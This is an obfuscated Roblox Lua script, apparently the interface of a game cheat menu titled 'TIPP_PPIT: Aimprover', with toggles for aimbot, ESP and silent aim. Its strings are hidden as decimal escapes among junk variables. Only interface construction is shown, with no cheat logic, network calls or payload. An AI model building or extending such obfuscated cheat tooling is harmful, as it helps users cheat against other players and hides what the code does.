local v_bbGEHqxEIM = Instance.new("\83\99\114\101\101\110\71\117\105")
local v_ghmquACSZq = Instance.new("\70\114\97\109\101")
local v_javELw = 887;
local v_hVTZsiLome = Instance.new("\73\109\97\103\101\76\97\98\101\108")
local v_jHDobQYRBg = Instance.new("\73\109\97\103\101\76\97\98\101\108")
local v_gLPSuusRXM = Instance.new("\84\101\120\116\66\117\116\116\111\110")
local v_vrJhMZPrIv = Instance.new("\70\114\97\109\101")
local v_puJlosvyYM = Instance.new("\73\109\97\103\101\76\97\98\101\108")
local v_COuAig = 312;
if v_COuAig > 198 then v_COuAig = v_COuAig + 1 end;
local v_RZcpZDcQFJ = Instance.new("\73\109\97\103\101\76\97\98\101\108")
local v_GciMbFuGGs = Instance.new("\84\101\120\116\76\97\98\101\108")
local v_yWJWeZtDfo = Instance.new("\70\114\97\109\101")
local v_DhkmVrGQyN = Instance.new("\70\114\97\109\101")
local v_DOxgKpfpGt = Instance.new("\73\109\97\103\101\76\97\98\101\108")
local v_suAiMOXpWH = Instance.new("\73\109\97\103\101\76\97\98\101\108")
local v_VwkPsWqSuB = Instance.new("\84\101\120\116\66\117\116\116\111\110")
local v_YImIKuwoiH = Instance.new("\84\101\120\116\66\117\116\116\111\110")
local v_CRkrbGuHPI = Instance.new("\84\101\120\116\66\117\116\116\111\110")
local v_ahsudZHmqx = Instance.new("\84\101\120\116\66\117\116\116\111\110")
local v_jKbgXyIxTL = Instance.new("\84\101\120\116\66\117\116\116\111\110")
local v_osTnZl = 118;
local v_xzzDjIOuMi = Instance.new("\70\114\97\109\101")
local v_FVyxxoKStS = Instance.new("\70\114\97\109\101")
local v_KQOwKWwQAO = Instance.new("\84\101\120\116\66\117\116\116\111\110")
local v_TKtkGeCrOL = Instance.new("\85\73\67\111\114\110\101\114")
local v_rfMyWf = 707;
local v_aiXPqHWBGB = Instance.new("\85\73\67\111\114\110\101\114")
local v_JdqhqGJhSs = Instance.new("\70\114\97\109\101")
local v_hCMdxG = 137;
local v_pSylYJMHmT = Instance.new("\70\114\97\109\101")
local v_JOCUsR = 638;
local v_OQuEByXoRC = Instance.new("\84\101\120\116\66\117\116\116\111\110")
local v_asdgrxsbdU = Instance.new("\85\73\67\111\114\110\101\114")
local v_RbkTsNXEzQ = Instance.new("\85\73\67\111\114\110\101\114")
local v_EIWckYbFep = Instance.new("\84\101\120\116\76\97\98\101\108")
local v_DjuWRh = 532;
local v_sjZGosXmpU = Instance.new("\84\101\120\116\76\97\98\101\108")
local v_tVHICAWQFN = Instance.new("\70\114\97\109\101")
local v_eWdpdDKwgl = Instance.new("\70\114\97\109\101")
local v_WbIpYW = 887;
local v_OmtxzyOIMZ = Instance.new("\84\101\120\116\66\117\116\116\111\110")
local v_RnkAaGXINv = Instance.new("\85\73\67\111\114\110\101\114")
local v_GSuyEVRJux = Instance.new("\85\73\67\111\114\110\101\114")
local v_PncUcLUjpW = Instance.new("\84\101\120\116\76\97\98\101\108")
local v_PRyanheFHH = Instance.new("\84\101\120\116\76\97\98\101\108")
local v_TasbMf = 471;
local v_YNscUUyaWI = Instance.new("\70\114\97\109\101")
local v_bCEPLofkYY = Instance.new("\70\114\97\109\101")
local v_EktHFSKVlX = Instance.new("\84\101\120\116\66\117\116\116\111\110")
local v_jjgqqKfzCI = Instance.new("\85\73\67\111\114\110\101\114")
local v_oDMZiqrauK = Instance.new("\85\73\67\111\114\110\101\114")
local v_OWYlWt = 16;
if v_OWYlWt > 32 then v_OWYlWt = v_OWYlWt + 1 end;

local v_EMrOin = 196;


local v_mcaplX = 638;
v_bbGEHqxEIM.Parent = game.Players.LocalPlayer:WaitForChild("\80\108\97\121\101\114\71\117\105")
local v_pFrdSU = 349;
v_bbGEHqxEIM.DisplayOrder = 999999999
v_bbGEHqxEIM.ResetOnSpawn = (1 == 2)

v_ghmquACSZq.Name = "\67\108\111\115\101\47\79\112\101\110\32\71\85\73"
v_ghmquACSZq.Parent = v_bbGEHqxEIM
v_ghmquACSZq.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
v_ghmquACSZq.BackgroundTransparency = 1.000
v_ghmquACSZq.BorderColor3 = Color3.fromRGB(0, 0, 0)
v_ghmquACSZq.BorderSizePixel = 0
v_ghmquACSZq.Position = UDim2.new(0.053970702, 0, 0.0817757025, 0)
v_ghmquACSZq.Size = UDim2.new(0, 70, 0, 70)

v_hVTZsiLome.Name = "\67\108\111\115\101\32\66"
v_hVTZsiLome.Parent = v_ghmquACSZq
v_hVTZsiLome.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
local v_YCwrvY = 197;
v_hVTZsiLome.BackgroundTransparency = 1.000
v_hVTZsiLome.BorderColor3 = Color3.fromRGB(27, 42, 53)
v_hVTZsiLome.Position = UDim2.new(0.0285714287, 0, 0.0285714287, 0)
local v_GMmhcI = 966;
v_hVTZsiLome.Size = UDim2.new(0, 65, 0, 65)
v_hVTZsiLome.Image = "\114\98\120\97\115\115\101\116\105\100\58\47\47\51\53\55\48\54\57\53\55\56\55"
v_hVTZsiLome.ImageColor3 = Color3.fromRGB(0, 0, 0)
v_hVTZsiLome.ScaleType = Enum.ScaleType.Slice
local v_qZsKTJ = 496;
if v_qZsKTJ > 392 then v_qZsKTJ = v_qZsKTJ + 1 end;
v_hVTZsiLome.SliceCenter = Rect.new(100, 100, 100, 100)
v_hVTZsiLome.SliceScale = 0.120

local v_pnAMEK = 189;
if v_pnAMEK > 145 then v_pnAMEK = v_pnAMEK + 1 end;
v_jHDobQYRBg.Name = "\67\108\111\115\101"
v_jHDobQYRBg.Parent = v_hVTZsiLome
v_jHDobQYRBg.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
v_jHDobQYRBg.BackgroundTransparency = 1.000
v_jHDobQYRBg.BorderColor3 = Color3.fromRGB(27, 42, 53)
v_jHDobQYRBg.Position = UDim2.new(0.0375000015, 0, 0.0350000001, 0)
local v_sxeiOb = 932;
v_jHDobQYRBg.Size = UDim2.new(0, 60, 0, 60)
v_jHDobQYRBg.Image = "\114\98\120\97\115\115\101\116\105\100\58\47\47\51\53\55\48\54\57\53\55\56\55"
v_jHDobQYRBg.ImageColor3 = Color3.fromRGB(27, 48, 27)
v_jHDobQYRBg.ScaleType = Enum.ScaleType.Slice
local v_fiUICb = 629;
if v_fiUICb > 180 then v_fiUICb = v_fiUICb + 1 end;
v_jHDobQYRBg.SliceCenter = Rect.new(100, 100, 100, 100)
v_jHDobQYRBg.SliceScale = 0.120

v_gLPSuusRXM.Name = "\67\108\111\115\101\47\79\112\101\110"
v_gLPSuusRXM.Parent = v_jHDobQYRBg
v_gLPSuusRXM.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
v_gLPSuusRXM.BackgroundTransparency = 1.000
local v_UlKVNw = 474;
v_gLPSuusRXM.BorderColor3 = Color3.fromRGB(0, 0, 0)
v_gLPSuusRXM.BorderSizePixel = 0
v_gLPSuusRXM.Position = UDim2.new(0, 0, -0.016666539, 0)
local v_fYKxDi = 215;
v_gLPSuusRXM.Size = UDim2.new(0, 60, 0, 60)
v_gLPSuusRXM.Font = Enum.Font.SourceSansBold
v_gLPSuusRXM.Text = "\84"
v_gLPSuusRXM.TextColor3 = Color3.fromRGB(0, 0, 0)
local v_tnaVgm = 541;
if v_tnaVgm > 463 then v_tnaVgm = v_tnaVgm + 1 end;
v_gLPSuusRXM.TextSize = 40.000

v_vrJhMZPrIv.Name = "\77\97\105\110\66\111\114\100\101\114\32\71\85\73"
local v_IbTxZn = 706;
if v_IbTxZn > 195 then v_IbTxZn = v_IbTxZn + 1 end;
v_vrJhMZPrIv.Parent = v_bbGEHqxEIM
v_vrJhMZPrIv.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
local v_lNfLNP = 712;
v_vrJhMZPrIv.BackgroundTransparency = 1.000
v_vrJhMZPrIv.BorderColor3 = Color3.fromRGB(0, 0, 0)
v_vrJhMZPrIv.BorderSizePixel = 0
local v_ijfWoM = 834;
v_vrJhMZPrIv.Position = UDim2.new(0.264456451, 0, 0.260514021, 0)
local v_nDARui = 953;
v_vrJhMZPrIv.Size = UDim2.new(0, 610, 0, 410)

local v_kHGYWc = 315;
if v_kHGYWc > 386 then v_kHGYWc = v_kHGYWc + 1 end;
v_puJlosvyYM.Name = "\77\97\105\110\66\111\114\100\101\114"
v_puJlosvyYM.Parent = v_vrJhMZPrIv
v_puJlosvyYM.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
v_puJlosvyYM.BackgroundTransparency = 1.000
v_puJlosvyYM.BorderColor3 = Color3.fromRGB(27, 42, 53)
v_puJlosvyYM.Position = UDim2.new(-0.00141951768, 0, -0.000816680142, 0)
v_puJlosvyYM.Size = UDim2.new(0, 610, 0, 410)
v_puJlosvyYM.Image = "\114\98\120\97\115\115\101\116\105\100\58\47\47\51\53\55\48\54\57\53\55\56\55"
v_puJlosvyYM.ImageColor3 = Color3.fromRGB(0, 0, 0)
v_puJlosvyYM.ScaleType = Enum.ScaleType.Slice
v_puJlosvyYM.SliceCenter = Rect.new(100, 100, 100, 100)
v_puJlosvyYM.SliceScale = 0.120

v_RZcpZDcQFJ.Name = "\77\97\105\110"
v_RZcpZDcQFJ.Parent = v_puJlosvyYM
v_RZcpZDcQFJ.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
v_RZcpZDcQFJ.BackgroundTransparency = 1.000
v_RZcpZDcQFJ.BorderColor3 = Color3.fromRGB(0, 0, 0)
v_RZcpZDcQFJ.BorderSizePixel = 4
v_RZcpZDcQFJ.Position = UDim2.new(0.00810807012, 0, 0.0100879204, 0)
v_RZcpZDcQFJ.Size = UDim2.new(0, 600, 0, 400)
v_RZcpZDcQFJ.Image = "\114\98\120\97\115\115\101\116\105\100\58\47\47\51\53\55\48\54\57\53\55\56\55"
local v_wAYXjs = 11;
v_RZcpZDcQFJ.ImageColor3 = Color3.fromRGB(16, 44, 19)
v_RZcpZDcQFJ.ScaleType = Enum.ScaleType.Slice
v_RZcpZDcQFJ.SliceCenter = Rect.new(100, 100, 100, 100)
v_RZcpZDcQFJ.SliceScale = 0.120

v_GciMbFuGGs.Name = "\84\73\80\80\95\80\80\73\84"
v_GciMbFuGGs.Parent = v_RZcpZDcQFJ
v_GciMbFuGGs.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
v_GciMbFuGGs.BackgroundTransparency = 1.000
v_GciMbFuGGs.BorderColor3 = Color3.fromRGB(0, 0, 0)
v_GciMbFuGGs.BorderSizePixel = 0
local v_eMeRWA = 960;
v_GciMbFuGGs.Position = UDim2.new(0.284999996, 0, 0, 0)
v_GciMbFuGGs.Size = UDim2.new(0, 342, 0, 50)
local v_IGdwbM = 186;
v_GciMbFuGGs.Font = Enum.Font.SourceSansBold
v_GciMbFuGGs.Text = "\84\73\80\80\95\80\80\73\84\58\32\65\105\109\112\114\111\118\101\114"
local v_vfXpRN = 497;
if v_vfXpRN > 33 then v_vfXpRN = v_vfXpRN + 1 end;
v_GciMbFuGGs.TextColor3 = Color3.fromRGB(0, 0, 0)
v_GciMbFuGGs.TextSize = 40.000
local v_hxVReP = 144;
if v_hxVReP > 290 then v_hxVReP = v_hxVReP + 1 end;

v_yWJWeZtDfo.Name = "\66\111\114\100\101\114\32\88"
v_yWJWeZtDfo.Parent = v_RZcpZDcQFJ
local v_GntQrR = 382;
if v_GntQrR > 208 then v_GntQrR = v_GntQrR + 1 end;
v_yWJWeZtDfo.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
v_yWJWeZtDfo.BorderColor3 = Color3.fromRGB(39, 59, 39)
local v_XOfWQA = 679;
if v_XOfWQA > 264 then v_XOfWQA = v_XOfWQA + 1 end;
v_yWJWeZtDfo.BorderSizePixel = 3
v_yWJWeZtDfo.Position = UDim2.new(0.148000002, 0, 0.126000002, 0)
v_yWJWeZtDfo.Size = UDim2.new(0, 508, 0, 5)
local v_VphHhn = 626;

local v_BLOxxR = 971;
if v_BLOxxR > 174 then v_BLOxxR = v_BLOxxR + 1 end;
v_DhkmVrGQyN.Name = "\66\111\114\100\101\114\32\89"
local v_uXoyXO = 684;
v_DhkmVrGQyN.Parent = v_yWJWeZtDfo
v_DhkmVrGQyN.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
v_DhkmVrGQyN.BorderColor3 = Color3.fromRGB(39, 59, 39)
local v_GudwKt = 502;
if v_GudwKt > 365 then v_GudwKt = v_GudwKt + 1 end;
v_DhkmVrGQyN.BorderSizePixel = 3
v_DhkmVrGQyN.Position = UDim2.new(-0.0114487773, 0, -9.39249897, 0)
local v_ETPQmz = 480;
if v_ETPQmz > 56 then v_ETPQmz = v_ETPQmz + 1 end;
v_DhkmVrGQyN.Size = UDim2.new(0, 5, 0, 393)

v_DOxgKpfpGt.Name = "\66\111\114\100\101\114\32\88\32\66"
v_DOxgKpfpGt.Parent = v_yWJWeZtDfo
local v_mtZGcp = 696;
v_DOxgKpfpGt.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
v_DOxgKpfpGt.BackgroundTransparency = 1.000
local v_OLYMIp = 913;
v_DOxgKpfpGt.BorderColor3 = Color3.fromRGB(27, 42, 53)
local v_uaRhDf = 228;
if v_uaRhDf > 321 then v_uaRhDf = v_uaRhDf + 1 end;
v_DOxgKpfpGt.Position = UDim2.new(-0.00160625787, 0, -0.0739990249, 0)
v_DOxgKpfpGt.Size = UDim2.new(0, 517, 0, 5)
v_DOxgKpfpGt.Image = "\114\98\120\97\115\115\101\116\105\100\58\47\47\51\53\55\48\54\57\53\55\56\55"
v_DOxgKpfpGt.ImageColor3 = Color3.fromRGB(0, 0, 0)
local v_ubaeOL = 901;
v_DOxgKpfpGt.ScaleType = Enum.ScaleType.Slice
v_DOxgKpfpGt.SliceCenter = Rect.new(100, 100, 100, 100)
v_DOxgKpfpGt.SliceScale = 0.120

v_suAiMOXpWH.Name = "\66\111\114\100\101\114\32\88\32\89"
local v_rBraRo = 974;
v_suAiMOXpWH.Parent = v_yWJWeZtDfo
v_suAiMOXpWH.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
v_suAiMOXpWH.BackgroundTransparency = 1.000
v_suAiMOXpWH.BorderColor3 = Color3.fromRGB(27, 42, 53)
v_suAiMOXpWH.Position = UDim2.new(-0.0114487773, 0, -10.079999, 0)
local v_lAqdcR = 810;
if v_lAqdcR > 233 then v_lAqdcR = v_lAqdcR + 1 end;
v_suAiMOXpWH.Size = UDim2.new(0, 5, 0, 400)
local v_dbFWMZ = 18;
v_suAiMOXpWH.Image = "\114\98\120\97\115\115\101\116\105\100\58\47\47\51\53\55\48\54\57\53\55\56\55"
v_suAiMOXpWH.ImageColor3 = Color3.fromRGB(0, 0, 0)
v_suAiMOXpWH.ScaleType = Enum.ScaleType.Slice
v_suAiMOXpWH.SliceCenter = Rect.new(100, 100, 100, 100)
local v_EMcGVP = 498;
if v_EMcGVP > 75 then v_EMcGVP = v_EMcGVP + 1 end;
v_suAiMOXpWH.SliceScale = 0.120

v_VwkPsWqSuB.Name = "\72\111\109\101"
v_VwkPsWqSuB.Parent = v_RZcpZDcQFJ
v_VwkPsWqSuB.BackgroundColor3 = Color3.fromRGB(20, 42, 17)
v_VwkPsWqSuB.BorderColor3 = Color3.fromRGB(39, 59, 39)
local v_mTqJyV = 537;
if v_mTqJyV > 257 then v_mTqJyV = v_mTqJyV + 1 end;
v_VwkPsWqSuB.BorderSizePixel = 3
v_VwkPsWqSuB.Position = UDim2.new(0.00999999978, 0, 0.150000006, 0)
v_VwkPsWqSuB.Size = UDim2.new(0, 70, 0, 50)
v_VwkPsWqSuB.Font = Enum.Font.SourceSansBold
v_VwkPsWqSuB.Text = "\72\79\77\69"
local v_OUCGxU = 224;
v_VwkPsWqSuB.TextColor3 = Color3.fromRGB(0, 0, 0)
v_VwkPsWqSuB.TextSize = 25.000

local v_sTfIFg = 190;
if v_sTfIFg > 390 then v_sTfIFg = v_sTfIFg + 1 end;
v_YImIKuwoiH.Name = "\78\101\118\101\114\32\67\111\109\105\110\103"
v_YImIKuwoiH.Parent = v_RZcpZDcQFJ
v_YImIKuwoiH.BackgroundColor3 = Color3.fromRGB(20, 42, 17)
v_YImIKuwoiH.BorderColor3 = Color3.fromRGB(39, 59, 39)
v_YImIKuwoiH.BorderSizePixel = 3
local v_nXESRW = 964;
v_YImIKuwoiH.Position = UDim2.new(0.00999999978, 0, 0.300000012, 0)
v_YImIKuwoiH.Size = UDim2.new(0, 70, 0, 50)
v_YImIKuwoiH.Font = Enum.Font.SourceSansBold
v_YImIKuwoiH.Text = "\78\101\118\101\114\32\99\111\109\105\110\103"
v_YImIKuwoiH.TextColor3 = Color3.fromRGB(0, 0, 0)
v_YImIKuwoiH.TextSize = 12.000
local v_bjtrkW = 229;
if v_bjtrkW > 471 then v_bjtrkW = v_bjtrkW + 1 end;

local v_Xebefi = 12;
v_CRkrbGuHPI.Name = "\78\101\118\101\114\32\67\111\109\105\110\103"
local v_WXKggW = 472;
if v_WXKggW > 87 then v_WXKggW = v_WXKggW + 1 end;
v_CRkrbGuHPI.Parent = v_RZcpZDcQFJ
v_CRkrbGuHPI.BackgroundColor3 = Color3.fromRGB(20, 42, 17)
local v_WZICKT = 704;
if v_WZICKT > 47 then v_WZICKT = v_WZICKT + 1 end;
v_CRkrbGuHPI.BorderColor3 = Color3.fromRGB(39, 59, 39)
v_CRkrbGuHPI.BorderSizePixel = 3
local v_ByVnmD = 461;
if v_ByVnmD > 402 then v_ByVnmD = v_ByVnmD + 1 end;
v_CRkrbGuHPI.Position = UDim2.new(0.00999999978, 0, 0.449999988, 0)
local v_tSAMuX = 619;
if v_tSAMuX > 375 then v_tSAMuX = v_tSAMuX + 1 end;
v_CRkrbGuHPI.Size = UDim2.new(0, 70, 0, 50)
v_CRkrbGuHPI.Font = Enum.Font.SourceSansBold
local v_lxezJm = 955;
v_CRkrbGuHPI.Text = "\78\101\118\101\114\32\99\111\109\105\110\103"
v_CRkrbGuHPI.TextColor3 = Color3.fromRGB(0, 0, 0)
v_CRkrbGuHPI.TextSize = 12.000

v_ahsudZHmqx.Name = "\78\101\118\101\114\32\67\111\109\105\110\103"
local v_MQxWPF = 928;
v_ahsudZHmqx.Parent = v_RZcpZDcQFJ
v_ahsudZHmqx.BackgroundColor3 = Color3.fromRGB(20, 42, 17)
local v_YzmpFM = 137;
v_ahsudZHmqx.BorderColor3 = Color3.fromRGB(39, 59, 39)
v_ahsudZHmqx.BorderSizePixel = 3
v_ahsudZHmqx.Position = UDim2.new(0.00999999978, 0, 0.600000024, 0)
v_ahsudZHmqx.Size = UDim2.new(0, 70, 0, 50)
v_ahsudZHmqx.Font = Enum.Font.SourceSansBold
v_ahsudZHmqx.Text = "\78\101\118\101\114\32\99\111\109\105\110\103"
v_ahsudZHmqx.TextColor3 = Color3.fromRGB(0, 0, 0)
local v_GIQCoN = 250;
if v_GIQCoN > 367 then v_GIQCoN = v_GIQCoN + 1 end;
v_ahsudZHmqx.TextSize = 12.000

local v_CdVpmS = 578;
if v_CdVpmS > 159 then v_CdVpmS = v_CdVpmS + 1 end;
v_jKbgXyIxTL.Name = "\78\101\118\101\114\32\67\111\109\105\110\103"
v_jKbgXyIxTL.Parent = v_RZcpZDcQFJ
local v_vEwZVf = 370;
if v_vEwZVf > 364 then v_vEwZVf = v_vEwZVf + 1 end;
v_jKbgXyIxTL.BackgroundColor3 = Color3.fromRGB(20, 42, 17)
local v_yQDLJv = 140;
v_jKbgXyIxTL.BorderColor3 = Color3.fromRGB(39, 59, 39)
v_jKbgXyIxTL.BorderSizePixel = 3
v_jKbgXyIxTL.Position = UDim2.new(0.00999999978, 0, 0.75, 0)
v_jKbgXyIxTL.Size = UDim2.new(0, 70, 0, 50)
v_jKbgXyIxTL.Font = Enum.Font.SourceSansBold
local v_dFBJCT = 781;
v_jKbgXyIxTL.Text = "\78\101\118\101\114\32\99\111\109\105\110\103"
v_jKbgXyIxTL.TextColor3 = Color3.fromRGB(0, 0, 0)
v_jKbgXyIxTL.TextSize = 12.000

v_xzzDjIOuMi.Name = "\65\105\109\98\111\116"
v_xzzDjIOuMi.Parent = v_RZcpZDcQFJ
v_xzzDjIOuMi.BackgroundColor3 = Color3.fromRGB(39, 59, 39)
local v_QDzBcu = 692;
if v_QDzBcu > 265 then v_QDzBcu = v_QDzBcu + 1 end;
v_xzzDjIOuMi.BorderColor3 = Color3.fromRGB(0, 0, 0)
local v_UYvgBi = 718;
if v_UYvgBi > 120 then v_UYvgBi = v_UYvgBi + 1 end;
v_xzzDjIOuMi.BorderSizePixel = 0
local v_FNmrbE = 848;
v_xzzDjIOuMi.Position = UDim2.new(0.709999979, 0, 0.200000003, 0)
local v_YhjgAT = 735;
if v_YhjgAT > 175 then v_YhjgAT = v_YhjgAT + 1 end;
v_xzzDjIOuMi.Size = UDim2.new(0, 130, 0, 30)
local v_RhCCsg = 267;

local v_GgVvos = 195;
if v_GgVvos > 309 then v_GgVvos = v_GgVvos + 1 end;
v_FVyxxoKStS.Name = "\65\105\109\98\111\116"
v_FVyxxoKStS.Parent = v_xzzDjIOuMi
v_FVyxxoKStS.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
v_FVyxxoKStS.BorderColor3 = Color3.fromRGB(0, 0, 0)
local v_Rtkvln = 798;
if v_Rtkvln > 188 then v_Rtkvln = v_Rtkvln + 1 end;
v_FVyxxoKStS.BorderSizePixel = 0
v_FVyxxoKStS.Position = UDim2.new(0.0154999997, 0, 0.0670000017, 0)
v_FVyxxoKStS.Size = UDim2.new(0, 125, 0, 25)

v_KQOwKWwQAO.Name = "\65\105\109\98\111\116\32\79\78\47\79\70\70"
v_KQOwKWwQAO.Parent = v_FVyxxoKStS
v_KQOwKWwQAO.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
v_KQOwKWwQAO.BackgroundTransparency = 1.000
v_KQOwKWwQAO.BorderColor3 = Color3.fromRGB(0, 0, 0)
v_KQOwKWwQAO.BorderSizePixel = 0
v_KQOwKWwQAO.Position = UDim2.new(0, 0, -0.0399987809, 0)
v_KQOwKWwQAO.Size = UDim2.new(0, 125, 0, 25)
v_KQOwKWwQAO.Font = Enum.Font.SourceSans
v_KQOwKWwQAO.Text = ""
v_KQOwKWwQAO.TextColor3 = Color3.fromRGB(0, 0, 0)
local v_gMxhAU = 820;
if v_gMxhAU > 437 then v_gMxhAU = v_gMxhAU + 1 end;
v_KQOwKWwQAO.TextSize = 14.000

v_TKtkGeCrOL.Parent = v_FVyxxoKStS

v_aiXPqHWBGB.Parent = v_xzzDjIOuMi

v_JdqhqGJhSs.Name = "\69\83\80"
v_JdqhqGJhSs.Parent = v_RZcpZDcQFJ
v_JdqhqGJhSs.BackgroundColor3 = Color3.fromRGB(39, 59, 39)
v_JdqhqGJhSs.BorderColor3 = Color3.fromRGB(0, 0, 0)
v_JdqhqGJhSs.BorderSizePixel = 0
v_JdqhqGJhSs.Position = UDim2.new(0.709666669, 0, 0.349999994, 0)
v_JdqhqGJhSs.Size = UDim2.new(0, 130, 0, 30)

v_pSylYJMHmT.Name = "\69\83\80"
v_pSylYJMHmT.Parent = v_JdqhqGJhSs
v_pSylYJMHmT.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
v_pSylYJMHmT.BorderColor3 = Color3.fromRGB(0, 0, 0)
v_pSylYJMHmT.BorderSizePixel = 0
local v_sWclZQ = 351;
v_pSylYJMHmT.Position = UDim2.new(0.0154999997, 0, 0.0670000017, 0)
v_pSylYJMHmT.Size = UDim2.new(0, 125, 0, 25)

v_OQuEByXoRC.Name = "\69\83\80\32\79\78\47\79\70\70"
local v_aUaChs = 974;
if v_aUaChs > 265 then v_aUaChs = v_aUaChs + 1 end;
v_OQuEByXoRC.Parent = v_pSylYJMHmT
v_OQuEByXoRC.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
local v_UOHyPZ = 125;
v_OQuEByXoRC.BackgroundTransparency = 1.000
local v_wIXceQ = 457;
v_OQuEByXoRC.BorderColor3 = Color3.fromRGB(0, 0, 0)
local v_EWrVLz = 788;
v_OQuEByXoRC.BorderSizePixel = 0
v_OQuEByXoRC.Position = UDim2.new(0, 0, -0.0399987809, 0)
v_OQuEByXoRC.Size = UDim2.new(0, 125, 0, 25)
v_OQuEByXoRC.Font = Enum.Font.SourceSans
v_OQuEByXoRC.Text = ""
local v_kbxpeW = 239;
v_OQuEByXoRC.TextColor3 = Color3.fromRGB(0, 0, 0)
v_OQuEByXoRC.TextSize = 14.000
local v_WhKQzs = 87;

v_asdgrxsbdU.Parent = v_pSylYJMHmT

v_RbkTsNXEzQ.Parent = v_JdqhqGJhSs

v_EIWckYbFep.Name = "\83\105\108\101\110\116\32\65\105\109"
v_EIWckYbFep.Parent = v_RZcpZDcQFJ
v_EIWckYbFep.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
v_EIWckYbFep.BackgroundTransparency = 1.000
v_EIWckYbFep.BorderColor3 = Color3.fromRGB(0, 0, 0)
v_EIWckYbFep.BorderSizePixel = 0
local v_sKbuxb = 812;
v_EIWckYbFep.Position = UDim2.new(0.185000002, 0, 0.474999994, 0)
v_EIWckYbFep.Size = UDim2.new(0, 342, 0, 50)
local v_hLeGSW = 70;
v_EIWckYbFep.Font = Enum.Font.SourceSansBold
v_EIWckYbFep.Text = "\83\105\108\101\110\116\32\65\105\109\58\32\40\110\111\116\32\109\105\110\101\41"
v_EIWckYbFep.TextColor3 = Color3.fromRGB(0, 0, 0)
v_EIWckYbFep.TextSize = 40.000
local v_JHVtYe = 578;
if v_JHVtYe > 292 then v_JHVtYe = v_JHVtYe + 1 end;
v_EIWckYbFep.TextXAlignment = Enum.TextXAlignment.Left

v_sjZGosXmpU.Name = "\69\83\80"
local v_opUucS = 295;
if v_opUucS > 118 then v_opUucS = v_opUucS + 1 end;
v_sjZGosXmpU.Parent = v_RZcpZDcQFJ
local v_MveCqf = 145;
if v_MveCqf > 467 then v_MveCqf = v_MveCqf + 1 end;
v_sjZGosXmpU.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
v_sjZGosXmpU.BackgroundTransparency = 1.000
v_sjZGosXmpU.BorderColor3 = Color3.fromRGB(0, 0, 0)
v_sjZGosXmpU.BorderSizePixel = 0
local v_TlrnvG = 765;
if v_TlrnvG > 221 then v_TlrnvG = v_TlrnvG + 1 end;
v_sjZGosXmpU.Position = UDim2.new(0.185000002, 0, 0.32249999, 0)
v_sjZGosXmpU.Size = UDim2.new(0, 342, 0, 50)
local v_jKGZCF = 740;
if v_jKGZCF > 434 then v_jKGZCF = v_jKGZCF + 1 end;
v_sjZGosXmpU.Font = Enum.Font.SourceSansBold
local v_zvfEvT = 722;
if v_zvfEvT > 175 then v_zvfEvT = v_zvfEvT + 1 end;
v_sjZGosXmpU.Text = "\69\83\80\58"
local v_hpweAQ = 621;
v_sjZGosXmpU.TextColor3 = Color3.fromRGB(0, 0, 0)
local v_qMjEWx = 709;
v_sjZGosXmpU.TextSize = 40.000
v_sjZGosXmpU.TextXAlignment = Enum.TextXAlignment.Left

v_tVHICAWQFN.Name = "\83\105\108\101\110\116\32\65\105\109"
v_tVHICAWQFN.Parent = v_RZcpZDcQFJ
local v_CDaSwn = 245;
if v_CDaSwn > 175 then v_CDaSwn = v_CDaSwn + 1 end;
v_tVHICAWQFN.BackgroundColor3 = Color3.fromRGB(39, 59, 39)
v_tVHICAWQFN.BorderColor3 = Color3.fromRGB(0, 0, 0)
v_tVHICAWQFN.BorderSizePixel = 0
v_tVHICAWQFN.Position = UDim2.new(0.709999979, 0, 0.5, 0)
v_tVHICAWQFN.Size = UDim2.new(0, 130, 0, 30)
local v_szhDFC = 733;
if v_szhDFC > 224 then v_szhDFC = v_szhDFC + 1 end;

v_eWdpdDKwgl.Name = "\83\105\108\101\110\116\32\65\105\109"
v_eWdpdDKwgl.Parent = v_tVHICAWQFN
v_eWdpdDKwgl.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
v_eWdpdDKwgl.BorderColor3 = Color3.fromRGB(0, 0, 0)
local v_RETZvs = 132;
v_eWdpdDKwgl.BorderSizePixel = 0
local v_SYgofH = 604;
v_eWdpdDKwgl.Position = UDim2.new(0.0154999997, 0, 0.0670000017, 0)
local v_CuqmUb = 954;
if v_CuqmUb > 330 then v_CuqmUb = v_CuqmUb + 1 end;
v_eWdpdDKwgl.Size = UDim2.new(0, 125, 0, 25)
local v_xCtLvX = 626;
if v_xCtLvX > 366 then v_xCtLvX = v_xCtLvX + 1 end;

v_OmtxzyOIMZ.Name = "\65\105\109\98\111\116\32\67\105\114\99\108\101\32\79\78\47\79\70\70"
v_OmtxzyOIMZ.Parent = v_eWdpdDKwgl
v_OmtxzyOIMZ.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
v_OmtxzyOIMZ.BackgroundTransparency = 1.000
v_OmtxzyOIMZ.BorderColor3 = Color3.fromRGB(0, 0, 0)
v_OmtxzyOIMZ.BorderSizePixel = 0
v_OmtxzyOIMZ.Position = UDim2.new(0, 0, -0.0399987809, 0)
v_OmtxzyOIMZ.Size = UDim2.new(0, 125, 0, 25)
v_OmtxzyOIMZ.Font = Enum.Font.SourceSans
local v_qqUWzj = 42;
v_OmtxzyOIMZ.Text = ""
v_OmtxzyOIMZ.TextColor3 = Color3.fromRGB(0, 0, 0)
v_OmtxzyOIMZ.TextSize = 14.000

v_RnkAaGXINv.Parent = v_eWdpdDKwgl

v_GSuyEVRJux.Parent = v_tVHICAWQFN
local v_VqoDaB = 12;
if v_VqoDaB > 88 then v_VqoDaB = v_VqoDaB + 1 end;

v_PncUcLUjpW.Name = "\65\105\109\98\111\116"
local v_DvblYx = 536;
v_PncUcLUjpW.Parent = v_RZcpZDcQFJ
